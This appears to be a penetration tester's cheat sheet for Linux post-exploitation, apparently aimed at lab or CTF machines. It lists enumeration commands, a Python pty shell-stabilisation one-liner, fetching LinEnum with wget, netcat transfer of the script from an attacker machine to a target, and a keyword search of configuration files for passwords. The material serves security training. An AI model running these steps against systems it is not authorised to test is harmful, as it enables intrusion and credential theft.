cat /etc/lsb-release (might not be installed**)**
cat /etc/os-release
cat /proc/version
cat /etc/issue **(the friendly version info)**
hostnamectl
diego-treitos/linux-smart-enumeration
sudo -l # If a result pops up, it's very likely to be the privesc
ip addr # Check if the box is dual homed
ps aux # Check non standard processes running as root, any processes that didn't show during initial exploitation
ss -plant # Check for services listening internally, checks similar to ps aux
# Stabilised TTY shell
python -c 'import pty; pty.spawn("/bin/sh")'
export TERM=xterm
LinuxPrivChecker #Check for privilege escalation methods
Unix-privesc-check # Script for finding common misconfigurations which can help elevate our privileges on a linux based system
Automated information gathering tool
wget [<https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh>](<https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh>)
If you’re unable to download LinEnum, you can use netcat to transfer it across by setting up a listener on the target to redirect incoming data to a new file while the attacker connects and redirects LinEnum.sh to the target:
Target machine:
nc -l -p 1234 > [LinEnum.sh](<http://linenum.sh/>)
Attacker machine:
nc -w 3 <target_IP> 1234 < [LinEnum.sh](<http://linenum.sh/>)
NOTE: when transferring files by netcat, all traffic is unencrypted and may be detected by Intrusion Detection Systems or other anomalous traffic detection mechanisms implemented within an organisation. It’s quick and easy to transfer files using netcat, but not stealthy.chmod +x [LinEnum.sh](<http://linenum.sh/>)./LinEnum.sh -h
Using the -k (keyword) option we ca have LinEnum search configuration files for a string such as “password” that can reveal credentials.